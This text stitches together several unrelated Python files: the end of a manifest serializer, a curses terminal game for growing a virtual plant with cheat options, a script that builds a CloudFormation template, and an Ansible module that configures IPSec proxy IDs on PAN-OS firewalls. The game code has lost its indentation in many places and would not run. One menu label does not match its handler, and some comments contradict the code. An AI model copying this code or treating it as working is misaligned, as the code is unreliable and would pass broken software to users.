        return [atom_names[node.data]]
    def visit_ConditionalNode(self, node):
        # children are (condition, value).
        return ["if %s: %s" % tuple(self.visit(item)[0] for item in node.children)]
    def visit_StringNode(self, node):
        rv = ["\"%s\"" % escape(node.data, extras="\"")]
        for child in node.children:
            # Trailing index expressions, e.g. "foo"[1].
            rv[0] += self.visit(child)[0]
        return rv
    def visit_NumberNode(self, node):
        return [str(node.data)]
    def visit_VariableNode(self, node):
        rv = escape(node.data)
        for child in node.children:
            rv += self.visit(child)
        return [rv]
    def visit_IndexNode(self, node):
        assert len(node.children) == 1
        return ["[%s]" % self.visit(node.children[0])[0]]
    def visit_UnaryExpressionNode(self, node):
        children = []
        for child in node.children:
            child_str = self.visit(child)[0]
            if isinstance(child, BinaryExpressionNode):
                # Parenthesize nested binary expressions to keep precedence.
                child_str = "(%s)" % child_str
            children.append(child_str)
        return [" ".join(children)]
    def visit_BinaryExpressionNode(self, node):
        assert len(node.children) == 3
        children = []
        # children[0] is the operator; [1, 0, 2] emits infix "lhs op rhs".
        for child_index in [1, 0, 2]:
            child = node.children[child_index]
            child_str = self.visit(child)[0]
            if (isinstance(child, BinaryExpressionNode) and
                precedence(node.children[0]) < precedence(child.children[0])):
                child_str = "(%s)" % child_str
            children.append(child_str)
        return [" ".join(children)]
    def visit_UnaryOperatorNode(self, node):
        return [str(node.data)]
    def visit_BinaryOperatorNode(self, node):
        return [str(node.data)]
def serialize(tree, *args, **kwargs):
    """Convenience wrapper: serialize *tree* with a fresh ManifestSerializer.

    Extra arguments are forwarded to the ManifestSerializer constructor.
    """
    return ManifestSerializer(*args, **kwargs).serialize(tree)
|
import curses
import math
import os
import traceback
import threading
import time
import random
# Debug/cheat switch -- leave False in normal play.
overflow = False # set to True to enable growth past final stage (softcorrupts plant file)
class CursedMenu(object):
#TODO: name your plant
'''A class which abstracts the horrors of building a curses-based menu system'''
    def __init__(self, this_plant, this_data):
        '''Set up curses, store plant/user state, and enter the main menu.'''
        self.initialized = False
        self.screen = curses.initscr()
        curses.noecho()
        curses.raw()
        curses.start_color()
        try:
            curses.curs_set(0)
        except curses.error:
            # Not all terminals support this functionality.
            # When the error is ignored the screen will look a little uglier, but that's not terrible
            # So in order to keep botany as accesible as possible to everyone, it should be safe to ignore the error.
            pass
        self.screen.keypad(1)
        self.plant = this_plant
        self.user_data = this_data
        # Cached display strings; refreshed by the background thread below.
        self.plant_string = self.plant.parse_plant()
        self.plant_ticks = str(self.plant.ticks)
        self.exit = False
        self.infotoggle = 0
        self.maxy, self.maxx = self.screen.getmaxyx()
        # Highlighted and Normal line definitions
        self.define_colors()
        self.highlighted = curses.color_pair(1)
        self.normal = curses.A_NORMAL
        # Threaded screen update for live changes
        screen_thread = threading.Thread(target=self.update_plant_live, args=())
        screen_thread.daemon = True
        screen_thread.start()
        self.screen.clear()
        self.show(["water","look","garden","instructions","set score to 9000","grow plant 1 stage","bring plant back from dead"], title=' botany ', subtitle='options')
def define_colors(self):
# set curses color pairs manually
curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_BLUE, curses.COLOR_BLACK)
curses.init_pair(5, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
curses.init_pair(6, curses.COLOR_YELLOW, curses.COLOR_BLACK)
curses.init_pair(7, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(8, curses.COLOR_CYAN, curses.COLOR_BLACK)
def show(self, options, title, subtitle):
# Draws a menu with parameters
self.set_options(options)
self.update_options()
self.title = title
self.subtitle = subtitle
self.selected = 0
self.initialized = True
self.draw_menu()
def update_options(self):
# Makes sure you can get a new plant if it dies
if self.plant.dead:
if "harvest" not in self.options:
self.options.insert(-1,"harvest")
else:
if self.plant.stage == 5:
if "harvest" not in self.options:
self.options.insert(-1,"harvest")
else:
if "harvest" in self.options:
self.options.remove("harvest")
def set_options(self, options):
# Validates that the last option is "exit"
if options[-1] is not 'exit':
options.append('exit')
self.options = options
    def draw(self):
        """Redraw the whole menu; on a drawing error, clean up and bail out."""
        # Draw the menu and lines
        self.screen.refresh()
        try:
            self.draw_default()
            self.screen.refresh()
        except Exception as exception:
            # Makes sure data is saved in event of a crash due to window resizing
            self.screen.clear()
            self.screen.addstr(0, 0, "Enlarge terminal!", curses.A_NORMAL)
            self.screen.refresh()
            # __exit__ is expected to persist state and tear down curses --
            # defined elsewhere in this class (not visible here).
            self.__exit__()
            traceback.print_exc()
def draw_menu(self):
# Actually draws the menu and handles branching
request = ""
try:
while request is not "exit":
self.draw()
request = self.get_user_input()
self.handle_request(request)
self.__exit__()
# Also calls __exit__, but adds traceback after
except Exception as exception:
self.screen.clear()
self.screen.addstr(0, 0, "Enlarge terminal!", curses.A_NORMAL)
self.screen.refresh()
self.__exit__()
#traceback.print_exc()
def ascii_render(self, filename, ypos, xpos):
# Prints ASCII art from file at given coordinates
this_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)),"art")
this_filename = os.path.join(this_dir,filename)
this_file = open(this_filename,"r")
this_string = this_file.readlines()
this_file.close()
for y, line in enumerate(this_string, 2):
self.screen.addstr(ypos+y, xpos, line, curses.A_NORMAL)
# self.screen.refresh()
def draw_plant_ascii(self, this_plant):
ypos = 1
xpos = int((self.maxx-37)/2 + 25)
plant_art_dict = {
0: 'poppy',
1: 'cactus',
2: 'aloe',
3: 'flytrap',
4: 'jadeplant',
5: 'fern',
6: 'daffodil',
7: 'sunflower',
8: 'baobab',
9: 'lithops',
10: 'hemp',
11: 'pansy',
12: 'iris',
13: 'agave',
14: 'ficus',
15: 'moss',
16: 'sage',
17: 'snapdragon',
18: 'columbine',
19: 'brugmansia',
20: 'palm',
}
if this_plant.dead == True:
self.ascii_render('rip.txt', ypos, xpos)
elif this_plant.stage == 0:
self.ascii_render('seed.txt', ypos, xpos)
elif this_plant.stage == 1:
self.ascii_render('seedling.txt', ypos, xpos)
elif this_plant.stage == 2:
this_filename = plant_art_dict[this_plant.species]+'1.txt'
self.ascii_render(this_filename, ypos, xpos)
elif this_plant.stage == 3 or this_plant.stage == 5:
this_filename = plant_art_dict[this_plant.species]+'2.txt'
self.ascii_render(this_filename, ypos, xpos)
elif this_plant.stage == 4:
this_filename = plant_art_dict[this_plant.species]+'3.txt'
self.ascii_render(this_filename, ypos, xpos)
    def draw_default(self):
        # draws default menu
        # Blank bar used to erase previously drawn rows (2/3 screen width).
        clear_bar = " " * (int(self.maxx*2/3))
        self.screen.addstr(2, 2, self.title, curses.A_STANDOUT) # Title for this menu
        self.screen.addstr(4, 2, self.subtitle, curses.A_BOLD) #Subtitle for this menu
        # clear menu on screen
        for index in range(len(self.options)+1):
            self.screen.addstr(5+index, 4, clear_bar, curses.A_NORMAL)
        # display all the menu items, showing the 'pos' item highlighted
        for index in range(len(self.options)):
            textstyle = self.normal
            if index == self.selected:
                textstyle = self.highlighted
            self.screen.addstr(5+index ,4, clear_bar, curses.A_NORMAL)
            self.screen.addstr(5+index ,4, "%d - %s" % (index+1, self.options[index]), textstyle)
        # Status rows: plant description (row 19) and score/ticks (row 20).
        self.screen.addstr(19, 2, clear_bar, curses.A_NORMAL)
        self.screen.addstr(20, 2, clear_bar, curses.A_NORMAL)
        self.screen.addstr(19, 2, "plant: ", curses.A_DIM)
        self.screen.addstr(19, 9, self.plant_string, curses.A_NORMAL)
        self.screen.addstr(20, 2, "score: ", curses.A_DIM)
        self.screen.addstr(20, 9, self.plant_ticks, curses.A_NORMAL)
        # display fancy water gauge
        if not self.plant.dead:
            water_gauge_str = self.water_gauge()
            self.screen.addstr(5,14, water_gauge_str, curses.A_NORMAL)
        else:
            self.screen.addstr(5,13, clear_bar, curses.A_NORMAL)
            self.screen.addstr(5,13, " ( RIP )", curses.A_NORMAL)
        # draw cute ascii from files
        self.draw_plant_ascii(self.plant)
def water_gauge(self):
# build nice looking water gauge
water_left_pct = 1 - ((time.time() - self.plant.watered_timestamp)/86400)
# don't allow negative value
water_left_pct = max(0, water_left_pct)
water_left = int(math.ceil(water_left_pct * 10))
water_string = "(" + (")" * water_left) + ("." * (10 - water_left)) + ") " + str(int(water_left_pct * 100)) + "% "
return water_string
    def update_plant_live(self):
        # updates plant data on menu screen, live!
        # Runs on the daemon thread started in __init__; loops once per
        # second until self.exit is set.
        while not self.exit:
            self.plant_string = self.plant.parse_plant()
            self.plant_ticks = str(self.plant.ticks)
            if self.initialized:
                # Only redraw once show() has fully configured the menu.
                self.update_options()
                self.draw()
            time.sleep(1)
def get_user_input(self):
# gets the user's input
try:
user_in = self.screen.getch() # Gets user input
except Exception as e:
self.__exit__()
## DEBUG KEYS - enable these lines to see curses key codes
# self.screen.addstr(1, 1, str(user_in), curses.A_NORMAL)
# self.screen.refresh()
# Resize sends curses.KEY_RESIZE, update display
if user_in == curses.KEY_RESIZE:
self.maxy,self.maxx = self.screen.getmaxyx()
self.screen.clear()
self.screen.refresh()
# enter and exit Keys are special cases
if user_in == 10:
return self.options[self.selected]
if user_in == 27:
return self.options[-1]
# this is a number; check to see if we can set it
if user_in >= ord('1') and user_in <= ord(str(min(9,len(self.options)+1))):
self.selected = user_in - ord('0') - 1 # convert keypress back to a number, then subtract 1 to get index
if self.selected > len(self.options):
self.selected = len(self.options)-1 # prevent choosing option outside of bounds
return
# increment or Decrement
down_keys = [curses.KEY_DOWN, 14, ord('j')]
up_keys = [curses.KEY_UP, 16, ord('k')]
if user_in in down_keys: # down arrow
self.selected += 1
if user_in in up_keys: # up arrow
self.selected -=1
# modulo to wrap menu cursor
self.selected = self.selected % len(self.options)
return
def format_garden_data(self,this_garden):
# Returns list of lists (pages) of garden entries
plant_table = ""
for plant_id in this_garden:
if this_garden[plant_id]:
if not this_garden[plant_id]["dead"]:
this_plant = this_garden[plant_id]
entry = "{:14} - {:>16} - {:>8}p - {}\n".format(
this_plant["owner"],
this_plant["age"],
this_plant["score"],
this_plant["description"]
)
plant_table += entry
# build list of n entries per page
entries_per_page = self.maxy - 16
garden_list = plant_table.splitlines()
paginated_list = [garden_list[i:i+entries_per_page] for i in range(0,len(garden_list),entries_per_page)]
return paginated_list
    def draw_garden(self):
        # draws community garden
        # Toggles the garden listing in the info pane (infotoggle == 2 means
        # the garden is currently displayed).
        # load data from sqlite db
        this_garden = self.user_data.retrieve_garden_from_db()
        # format data
        self.clear_info_pane()
        plant_table_pages = []
        if self.infotoggle != 2:
            # if infotoggle isn't 2, the screen currently displays other stuff
            plant_table_pages = self.format_garden_data(this_garden)
            self.infotoggle = 2
        else:
            # the screen IS currently showing the garden (1 page), make the
            # text a bunch of blanks to clear it out
            self.infotoggle = 0
        # print garden information OR clear it
        for page_num, page in enumerate(plant_table_pages, 1):
            # Print page text
            self.draw_info_text(page)
            if len(plant_table_pages) > 1:
                # Multiple pages, paginate and require keypress
                page_text = "(%d/%d) --- press any key ---" % (page_num, len(plant_table_pages))
                self.screen.addstr(self.maxy-2, 2, page_text)
                self.screen.getch()
                self.screen.refresh()
                # Clear page before drawing next
                self.clear_info_pane()
                self.infotoggle = 0
    def get_plant_description(self, this_plant):
        """Build the flavor text for *this_plant*: a random stage-appropriate
        line, plus growth/species/color hints depending on the stage."""
        output_text = ""
        this_species = this_plant.species_dict[this_plant.species]
        this_color = this_plant.color_dict[this_plant.color]
        this_stage = this_plant.stage
        # One pool of candidate lines per growth stage; 99 is the dead state.
        stage_descriptions = {
                0:[
            "You're excited about your new seed.",
            "You wonder what kind of plant your seed will grow into.",
            "You're ready for a new start with this plant.",
            "You're tired of waiting for your seed to grow.",
            "You wish your seed could tell you what it needs.",
            "You can feel the spirit inside your seed.",
            "These pretzels are making you thirsty.",
            "Way to plant, Ann!",
            "'To see things in the seed, that is genius' - Lao Tzu",
            ],
                1:[
            "The seedling fills you with hope.",
            "The seedling shakes in the wind.",
            "You can make out a tiny leaf - or is that a thorn?",
            "You can feel the seedling looking back at you.",
            "You blow a kiss to your seedling.",
            "You think about all the seedlings who came before it.",
            "You and your seedling make a great team.",
            "Your seedling grows slowly and quietly.",
            "You meditate on the paths your plant's life could take.",
            ],
                2:[
            "The " + this_species + " makes you feel relaxed.",
            "You sing a song to your " + this_species + ".",
            "You quietly sit with your " + this_species + " for a few minutes.",
            "Your " + this_species + " looks pretty good.",
            "You play loud techno to your " + this_species + ".",
            "You play piano to your " + this_species + ".",
            "You play rap music to your " + this_species + ".",
            "You whistle a tune to your " + this_species + ".",
            "You read a poem to your " + this_species + ".",
            "You tell a secret to your " + this_species + ".",
            "You play your favorite record for your " + this_species + ".",
            ],
                3:[
            "Your " + this_species + " is growing nicely!",
            "You're proud of the dedication it took to grow your " + this_species + ".",
            "You take a deep breath with your " + this_species + ".",
            "You think of all the words that rhyme with " + this_species + ".",
            "The " + this_species + " looks full of life.",
            "The " + this_species + " inspires you.",
            "Your " + this_species + " makes you forget about your problems.",
            "Your " + this_species + " gives you a reason to keep going.",
            "Looking at your " + this_species + " helps you focus on what matters.",
            "You think about how nice this " + this_species + " looks here.",
            "The buds of your " + this_species + " might bloom soon.",
            ],
                4:[
            "The " + this_color + " flowers look nice on your " + this_species +"!",
            "The " + this_color + " flowers have bloomed and fill you with positivity.",
            "The " + this_color + " flowers remind you of your childhood.",
            "The " + this_color + " flowers remind you of spring mornings.",
            "The " + this_color + " flowers remind you of a forgotten memory.",
            "The " + this_color + " flowers remind you of your happy place.",
            "The aroma of the " + this_color + " flowers energize you.",
            "The " + this_species + " has grown beautiful " + this_color + " flowers.",
            "The " + this_color + " petals remind you of that favorite shirt you lost.",
            "The " + this_color + " flowers remind you of your crush.",
            "You smell the " + this_color + " flowers and are filled with peace.",
            ],
                5:[
            "You fondly remember the time you spent caring for your " + this_species + ".",
            "Seed pods have grown on your " + this_species + ".",
            "You feel like your " + this_species + " appreciates your care.",
            "The " + this_species + " fills you with love.",
            "You're ready for whatever comes after your " + this_species + ".",
            "You're excited to start growing your next plant.",
            "You reflect on when your " + this_species + " was just a seedling.",
            "You grow nostalgic about the early days with your " + this_species + ".",
            ],
                99:[
            "You wish you had taken better care of your plant.",
            "If only you had watered your plant more often..",
            "Your plant is dead, there's always next time.",
            "You cry over the withered leaves of your plant.",
            "Your plant died. Maybe you need a fresh start.",
            ],
        }
        # self.life_stages is tuple containing length of each stage
        # (seed, seedling, young, mature, flowering)
        if this_plant.dead:
            this_stage = 99
        this_stage_descriptions = stage_descriptions[this_stage]
        description_num = random.randint(0,len(this_stage_descriptions) - 1)
        # If not fully grown
        if this_stage <= 4:
            # Growth hint
            if this_stage >= 1:
                last_growth_at = this_plant.life_stages[this_stage - 1]
            else:
                last_growth_at = 0
            ticks_since_last = this_plant.ticks - last_growth_at
            ticks_between_stage = this_plant.life_stages[this_stage] - last_growth_at
            # Tease the upcoming stage once 80% of the way there.
            if ticks_since_last >= ticks_between_stage * 0.8:
                output_text += "You notice your plant looks different.\n"
        output_text += this_stage_descriptions[description_num] + "\n"
        # if seedling
        if this_stage == 1:
            # Offer the true species plus two decoys (+/- 3, wrapping).
            species_options = [this_plant.species_dict[this_plant.species],
                    this_plant.species_dict[(this_plant.species+3) % len(this_plant.species_dict)],
                    this_plant.species_dict[(this_plant.species-3) % len(this_plant.species_dict)]]
            random.shuffle(species_options)
            plant_hint = "It could be a(n) " + species_options[0] + ", " + species_options[1] + ", or " + species_options[2]
            output_text += plant_hint + ".\n"
        # if young plant
        if this_stage == 2:
            if this_plant.rarity >= 2:
                rarity_hint = "You feel like your plant is special."
                output_text += rarity_hint + ".\n"
        # if mature plant
        if this_stage == 3:
            # Same decoy scheme as the species hint, but for flower color.
            color_options = [this_plant.color_dict[this_plant.color],
                    this_plant.color_dict[(this_plant.color+3) % len(this_plant.color_dict)],
                    this_plant.color_dict[(this_plant.color-3) % len(this_plant.color_dict)]]
            random.shuffle(color_options)
            plant_hint = "You can see the first hints of " + color_options[0] + ", " + color_options[1] + ", or " + color_options[2]
            output_text += plant_hint + ".\n"
        return output_text
def draw_plant_description(self, this_plant):
    """Toggle the plant description in the info pane.

    First press draws the description; pressing again just clears it.
    """
    # If menu is currently showing something other than the description
    self.clear_info_pane()
    if self.infotoggle != 1:
        # get plant description before printing
        output_string = self.get_plant_description(this_plant)
        growth_multiplier = 1 + (0.2 * (this_plant.generation - 1))
        # Bug fix: the original read self.plant.generation here, ignoring the
        # this_plant parameter used everywhere else in this method.
        output_string += "Generation: {}\nGrowth rate: {}".format(this_plant.generation, growth_multiplier)
        self.draw_info_text(output_string)
        self.infotoggle = 1
    else:
        # otherwise just set toggle
        self.infotoggle = 0
def draw_instructions(self):
    """Toggle the help text in the info pane."""
    self.clear_info_pane()
    if self.infotoggle == 4:
        # Help is already showing; the pane was cleared above, so just
        # reset the toggle.
        self.infotoggle = 0
        return
    instructions_txt = ("welcome to botany. you've been given a seed\n"
                        "that will grow into a beautiful plant. check\n"
                        "in and water your plant every 24h to keep it\n"
                        "growing. 5 days without water = death. your\n"
                        "plant depends on you to live! more info is\n"
                        "available in the readme :)\n"
                        " cheers,\n"
                        " curio\n"
                        )
    self.draw_info_text(instructions_txt)
    self.infotoggle = 4
def clear_info_pane(self):
    """Blank out the info pane at the bottom of the screen."""
    blank_row = " " * (self.maxx - 2)
    row_count = self.maxy - 15
    # Rows 14 onward hold the info pane (matches draw_info_text's offsets).
    for offset in range(row_count):
        self.screen.addstr(offset + 14, 2, blank_row, curses.A_NORMAL)
    self.screen.refresh()
def draw_info_text(self, info_text):
    """Print lines of text to the info pane at the bottom of the screen.

    Accepts either a single string (split on newlines) or an iterable of
    pre-split lines.
    """
    # isinstance instead of the original `type(...) is str` so str
    # subclasses are handled too.
    if isinstance(info_text, str):
        info_text = info_text.splitlines()
    for y, line in enumerate(info_text, 2):
        self.screen.addstr(y + 12, 2, line, curses.A_NORMAL)
    self.screen.refresh()
def harvest_confirmation(self):
    """Prompt the user to confirm a harvest; on 'y'/'Y' restart the plant."""
    self.clear_info_pane()
    # get plant description before printing
    max_stage = len(self.plant.stage_dict) - 1
    harvest_text = ""
    if not self.plant.dead:
        if self.plant.stage == max_stage:
            harvest_text += "Congratulations! You raised your plant to its final stage of growth.\n"
            harvest_text += "Your next plant will grow at a speed of: {}x\n".format(1 + (0.2 * self.plant.generation))
    harvest_text += "If you harvest your plant you'll start over from a seed.\nContinue? (Y/n)"
    self.draw_info_text(harvest_text)
    try:
        user_in = self.screen.getch()  # Gets user input
    except Exception:
        # The screen is gone; bail out here. The original fell through and
        # hit a NameError on the unbound user_in below.
        self.__exit__()
        return
    if user_in in [ord('Y'), ord('y')]:
        self.plant.start_over()
    self.clear_info_pane()
def handle_request(self, request):
    """Dispatch a menu selection string to the matching plant/screen action."""
    # Menu options call functions here
    if request is None:
        return
    if request == "harvest":
        self.harvest_confirmation()
    if request == "water":
        self.plant.water()
    if request == "look":
        try:
            self.draw_plant_description(self.plant)
        except Exception:
            # Drawing can fail (e.g. tiny terminal); keep the UI alive.
            self.screen.refresh()
    if request == "instructions":
        try:
            self.draw_instructions()
        except Exception:
            self.screen.refresh()
    if request == "garden":
        try:
            self.draw_garden()
        except Exception:
            self.screen.refresh()
    if request == "set score to 9000":
        self.plant.ticks = 9000
    if request == "grow plant 1 stage":
        oldstage = self.plant.stage
        self.plant.growth()
        # Force the stage bump if growth() declined to advance. The original
        # guarded this with an undefined name `overflow`, which raised
        # NameError whenever growth() left the stage unchanged.
        if self.plant.stage == oldstage:
            self.plant.stage += 1
    if request == "bring plant back from the dead":
        self.plant.dead = False
        self.plant.watered_timestamp = time.time()
def __exit__(self):
    # Tear down the curses UI and restore the terminal.
    self.exit = True  # signal any running loops to stop
    curses.curs_set(2)  # restore a visible cursor
    curses.endwin()  # must end curses mode before shelling out
    os.system('clear')
|
from __future__ import print_function
from cfn_pyplates import functions
import respawn
import sys
def standardize_refs(d):
    """
    Recursively transform all ref's and get_att's in dictionary to CloudFormation references.

    Mutates d in place: string values (and strings inside lists) are run
    through transform_reference; nested dicts are recursed into.
    """
    # .items() instead of the Python-2-only .iteritems() (the file already
    # imports print_function for 2/3 compatibility). Only values are
    # reassigned, never keys, so iterating the live view is safe.
    for k, v in d.items():
        if isinstance(v, dict):
            standardize_refs(v)
        elif isinstance(v, list):
            for i in range(len(v)):
                if isinstance(v[i], dict):
                    standardize_refs(v[i])
                elif isinstance(v[i], str):
                    v[i] = transform_reference(v[i])
        elif isinstance(v, str):
            d[k] = transform_reference(v)
def transform_reference(v):
    """
    Transform ref and ref_att in dictionary to CloudFormation ref or get_att
    """
    if v.startswith('ref('):
        inner = v[len('ref('):-1].strip()
        return functions.ref(inner)
    if v.startswith('get_att('):
        parts = [part.strip() for part in v[len('get_att('):-1].split(',')]
        return functions.get_att(parts[0], parts[1])
    # Plain strings pass through untouched.
    return v
# Build the CloudFormation template from the parsed options: convert the
# shorthand ref()/get_att() strings, then instantiate each resource section.
# Each section keeps its own try block so failures name the offending
# resource type.
resources = dict()
cft = respawn.cloudformation.Template(**options)
standardize_refs(options)

# Pre-bind `name` so a failure before the first loop iteration (e.g. a
# section that is not a mapping) cannot raise NameError inside an except
# handler below.
name = None

try:
    if 'load_balancers' in options:
        for name, lb_opts in options['load_balancers'].items():
            lb = cft.add_load_balancer(name, **lb_opts)
            resources[name] = lb
except Exception as e:
    raise RuntimeError("Required arguments missing from Load Balancer: {0}: Exception: {1}".format(name, e))
try:
    if 'instances' in options:
        for name, instance_opts in options['instances'].items():
            resources[name] = cft.add_instance(name, **instance_opts)
except Exception as e:
    # Message fixed: the original labelled the resource name "Exception".
    raise RuntimeError("Required arguments missing from Instance: {0}: Exception: {1}".format(name, e))
try:
    if 'volumes' in options:
        for name, volume_opts in options['volumes'].items():
            resources[name] = cft.add_volume(name, **volume_opts)
except Exception as e:
    raise RuntimeError("Required arguments missing from Volume: {0}: Exception: {1}".format(name, e))
try:
    if 'auto_scale_groups' in options:
        for name, asg_opts in options['auto_scale_groups'].items():
            resources[name] = cft.add_autoscaling_group(name, **asg_opts)
except Exception as e:
    raise RuntimeError("Required arguments missing from Autoscaling Group: {0}: Exception: {1}".format(name, e))
try:
    if 'launch_configurations' in options:
        for name, lc_opts in options['launch_configurations'].items():
            resources[name] = cft.add_launch_config(name, **lc_opts)
except Exception as e:
    raise RuntimeError("Required arguments missing from Launch Configuration: {0}: Exception: {1}".format(name, e))
try:
    if 'scheduled_actions' in options:
        for name, sa_opts in options['scheduled_actions'].items():
            resources[name] = cft.add_scheduled_action(name, **sa_opts)
except Exception as e:
    raise RuntimeError("Required arguments missing from Scheduled Action: {0}: Exception: {1}".format(name, e))
try:
    if 'lifecycle_hooks' in options:
        for name, lh_opts in options['lifecycle_hooks'].items():
            resources[name] = cft.add_lifecycle_hook(name, **lh_opts)
except Exception as e:
    raise RuntimeError("Required arguments missing from Lifecycle Hook: {0}: Exception: {1}".format(name, e))
try:
    if 'rds' in options:
        for name, rds_opts in options['rds'].items():
            resources[name] = cft.add_rds_instance(name, **rds_opts)
except Exception as e:
    raise RuntimeError("Required arguments missing from RDS: {0}: Exception: {1}".format(name, e))
try:
    if 'cloud_watch' in options:
        for name, cloud_watch_opts in options['cloud_watch'].items():
            resources[name] = cft.add_cloud_watch_alarm(name, **cloud_watch_opts)
except Exception as e:
    raise RuntimeError("Required arguments missing from Cloud Watch: {0}: Exception: {1}".format(name, e))
try:
    if 'network_interfaces' in options:
        for name, network_interface_opts in options['network_interfaces'].items():
            resources[name] = cft.add_network_interface(name, **network_interface_opts)
except Exception as e:
    raise RuntimeError("Required arguments missing from Network Interface: {0}: Exception: {1}".format(name, e))
try:
    if 'network_interface_attachments' in options:
        for name, nia_opts in options['network_interface_attachments'].items():
            resources[name] = cft.add_network_interface_attachment(name, **nia_opts)
except Exception as e:
    raise RuntimeError("Required arguments missing from Network Interface Attachment: {0}: Exception: {1}".format(name, e))
try:
    if 'security_group' in options:
        for name, sg_opts in options['security_group'].items():
            resources[name] = cft.add_security_group(name, **sg_opts)
except Exception as e:
    raise RuntimeError("Required arguments missing from Security Group: {0}: Exception: {1}".format(name, e))
try:
    if 'parameters' in options:
        for name, parameter_opts in options['parameters'].items():
            # Parameters are template inputs, not resources, so they are not
            # recorded in the resources map.
            cft.add_parameter(name, **parameter_opts)
except Exception as e:
    # The original discarded the exception details entirely here.
    raise RuntimeError("Required arguments missing from Parameters: {0}: Exception: {1}".format(name, e))
try:
    if 'sns_topics' in options:
        for name, sns_opts in options['sns_topics'].items():
            resources[name] = cft.add_sns_topic(name, **sns_opts)
except Exception as e:
    raise RuntimeError("Required arguments missing from SNS Topic: {0}: Exception: {1}".format(name, e))
try:
    if 'record_set' in options:
        for name, values in options['record_set'].items():
            resources[name] = cft.add_route53_record_set(name, **values)
except Exception as e:
    # The original message said "SNS Topic" here (copy/paste error).
    raise RuntimeError("Required arguments missing from Record Set: {0}: Exception: {1}".format(name, e))
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Standard Ansible module metadata: community-supported, preview status.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}
# Module documentation. YAML fix: plain list items containing "Key: value"
# colons must be quoted or they parse as mappings, and the udp_local_port
# description was missing its leading list dash.
DOCUMENTATION = '''
---
module: panos_ipsec_ipv4_proxyid
short_description: Configures IPv4 Proxy Id on an IPSec Tunnel
author: "Heiko Burghardt (@odysseus107)"
version_added: "2.8"
requirements:
    - pan-python can be obtained from PyPI U(https://pypi.python.org/pypi/pan-python)
    - pandevice can be obtained from PyPI U(https://pypi.python.org/pypi/pandevice)
notes:
    - Panorama is supported.
    - Check mode is supported.
extends_documentation_fragment:
    - panos.transitional_provider
    - panos.state
    - panos.full_template_support
options:
    name:
        description:
            - The Proxy ID
        required: true
    tunnel_name:
        description:
            - IPSec Tunnel Name
        required: true
    local:
        description:
            - IP subnet or IP address represents the local network
        required: true
    remote:
        description:
            - IP subnet or IP address represents the remote network
        required: true
    any_protocol:
        description:
            - Any protocol boolean
        default: True
        type: bool
    number_proto:
        description:
            - 'Numbered Protocol: protocol number (1-254)'
        type: int
    tcp_local_port:
        description:
            - 'Protocol TCP: local port'
        type: int
    tcp_remote_port:
        description:
            - 'Protocol TCP: remote port'
        type: int
    udp_local_port:
        description:
            - 'Protocol UDP: local port'
        type: int
    udp_remote_port:
        description:
            - 'Protocol UDP: remote port'
        type: int
    commit:
        description:
            - Commit configuration if changed.
        default: True
        type: bool
'''
EXAMPLES = '''
- name: Add IPSec IPv4 Proxy ID
panos_ipsec_ipv4_proxyid:
provider: '{{ provider }}'
name: 'IPSec-ProxyId'
tunnel_name: 'Default_Tunnel'
local: '192.168.2.0/24'
remote: '192.168.1.0/24'
commit: False
'''
RETURN = '''
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.panos.panos import get_connection
try:
from pandevice.network import IpsecTunnel
from pandevice.network import IpsecTunnelIpv4ProxyId
from pandevice.errors import PanDeviceError
except ImportError:
pass
def main():
    """Create/update/delete an IPv4 Proxy ID on an IPSec tunnel via pandevice."""
    # Build the argument spec through the shared PAN-OS connection helper;
    # it injects provider/state/template options alongside the ones below.
    helper = get_connection(
        template=True,
        template_stack=True,
        with_classic_provider_spec=True,
        with_state=True,
        argument_spec=dict(
            name=dict(
                type='str', required=True,
                help='The Proxy ID'),
            # NOTE(review): DOCUMENTATION marks tunnel_name/local/remote as
            # required, but they are given defaults here - confirm intent.
            tunnel_name=dict(
                default='default',
                help='The IPSec Tunnel Name'),
            local=dict(
                default='192.168.2.0/24',
                help='IP subnet or IP address represents the local network'),
            remote=dict(
                default='192.168.1.0/24',
                help='IP subnet or IP address represents the remote network'),
            any_protocol=dict(
                type='bool', default=True,
                help='Any protocol boolean'),
            number_proto=dict(
                type='int',
                help='Numbered Protocol: protocol number (1-254)'),
            tcp_local_port=dict(
                type='int',
                help='Protocol TCP: local port'),
            tcp_remote_port=dict(
                type='int',
                help='Protocol TCP: remote port'),
            udp_local_port=dict(
                type='int',
                help='Protocol UDP: local port'),
            udp_remote_port=dict(
                type='int',
                help='Protocol UDP: remote port'),
            commit=dict(
                type='bool', default=True,
                help='Commit configuration if changed'),
        )
    )
    module = AnsibleModule(
        argument_spec=helper.argument_spec,
        supports_check_mode=True,
        required_one_of=helper.required_one_of
    )
    # Object specifications: keyword arguments for IpsecTunnelIpv4ProxyId.
    # NOTE(review): assumes the pandevice parameter is spelled
    # 'number_protocol' while the module option is 'number_proto' - confirm
    # against the pandevice API.
    spec = {
        'name': module.params['name'],
        'local': module.params['local'],
        'remote': module.params['remote'],
        'any_protocol': module.params['any_protocol'],
        'number_protocol': module.params['number_proto'],
        'tcp_local_port': module.params['tcp_local_port'],
        'tcp_remote_port': module.params['tcp_remote_port'],
        'udp_local_port': module.params['udp_local_port'],
        'udp_remote_port': module.params['udp_remote_port'],
    }
    # Additional infos
    commit = module.params['commit']
    # Verify libs are present, get parent object.
    parent = helper.get_pandevice_parent(module)
    tunnel_name = module.params['tunnel_name']
    # get the tunnel object; refresh pulls its current children from the device
    tunnel = IpsecTunnel(tunnel_name)
    parent.add(tunnel)
    try:
        tunnel.refresh()
    except PanDeviceError as e:
        module.fail_json(msg='Failed refresh: {0}'.format(e))
    # get the listing of existing proxy IDs for idempotent state application
    listing = tunnel.findall(IpsecTunnelIpv4ProxyId)
    obj = IpsecTunnelIpv4ProxyId(**spec)
    tunnel.add(obj)
    # Apply the state.
    changed = helper.apply_state(obj, listing, module)
    # Commit.
    if commit and changed:
        helper.commit(module)
    # Done.
    module.exit_json(changed=changed)
# Standard Ansible module entry point.
if __name__ == '__main__':
    main()
|
import os

